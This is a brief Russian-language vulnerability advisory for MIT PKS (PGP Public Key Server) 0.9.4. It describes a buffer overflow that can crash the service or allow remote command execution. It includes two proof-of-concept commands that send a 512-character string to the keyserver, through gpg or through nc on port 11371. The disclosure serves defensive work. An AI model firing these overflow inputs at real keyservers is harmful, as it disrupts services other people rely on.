MIT PKS (Public Key Server) содержит буфер, который
каждый пользователь может переполнить, это
может привести к отказу в работе сервиса
или выполнению произвольных команд на
удаленной системе.
Эксплоит:
#gpg --search-keys `perl -e "print 'A'x512"`
или
#echo -e "GET /pks/lookup?op=index&search=`perl -e "print
'A'x512"`"| nc keyserver-host 11371
Уязвимая версия PGP Public Key Server version 0.9.4.